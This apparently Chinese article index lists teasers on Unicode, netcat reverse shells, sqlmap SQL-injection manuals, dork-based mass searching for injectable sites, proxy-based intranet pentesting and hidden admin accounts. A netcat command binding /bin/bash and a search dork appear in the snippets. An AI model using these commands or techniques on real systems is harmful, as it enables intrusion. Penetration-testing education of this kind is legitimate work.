基本知识 字节和字符的区别 Big Endian和Little Endian UCS-2和UCS-4 UTF-16和UTF-32 UTF-16 UTF-32 UTF-8 基本知识 介绍Unicode之...
知识科普
知识科普
网络安全
Unix系统NC反弹shell的方法
NC的原生做法: nc -l -vv -p 2222 -e /bin/bash无法使用NC反弹的时候可以这样 先在tmp创建一个普通管道mknod /tmp/backpipe p或者mkfifo /t...
sqlmap用户手册[续篇]
ps:其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊,现在的人通读看文章的耐心都没有了,遇到了哪个问题就想起针对这个问题求助,却不知道仔细看完之后,以后可以省多少时间来...
SqlMap用户手册
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入...
Sqlmap注入技巧集锦
软件名称:sqlmap 一个自动SQL 射入工具(sqlmap.py)汉化直接可用版软件大小:6.4MB更新时间:2012-10-16 TIP1 当我们注射的时候,判断注入 http://site/s...
网络安全
利用php+socket5代理进行内网渗透测试
我用到的工具是phpsocks和大家经常翻墙用的goagent,两款软件相对比,各有优势,phpsocks需要连接数据库,不过这个问题可以通过自 己修改下他的PHP脚本和java客户端即可解决,昨天想...
系统文档
使用搜索引擎搜索资料的方法
如何使用搜索引擎搜索资料,搜索引擎的使用方法 1、打开搜索引擎 1)打开网页浏览器,在地址栏输入百度搜索的网址 www.baidu.com 然后点右边的转到按钮,或者按一下回车键; 2)进入百度搜索页...
网络安全
教你使用搜索引擎批量检测网站注入点
可是在最近2年,已经无法通过百度批量查找网站是否存在注入漏洞了。 例如:我们要搜索所有网站后缀存在common.asp?id=页面的时候就可以通过inurl:common.asp?id=进行批量检测那...
系统文档
删除用户时提示无法在内置账户上运行此操作
如果管理员遇到这样的情况的话就需要注意了你的服务器可能被入侵了。 一般黑客都将这种的添加账号的手段称为”不死账户” 首先我们来了解建立不死账户的方法, 1.黑客其将guest用...
极客品尝
认知指纹:颠覆性的身份认证技术
导读如果一个网站只需要输入用户名,然后点击“登录”按钮,就可以成功登录,并且其他人无法进入你的账户,听起来是不是很不可思议?—— 事实上,你输入用户名的时候,网站就已经认出你了。传统身份认...
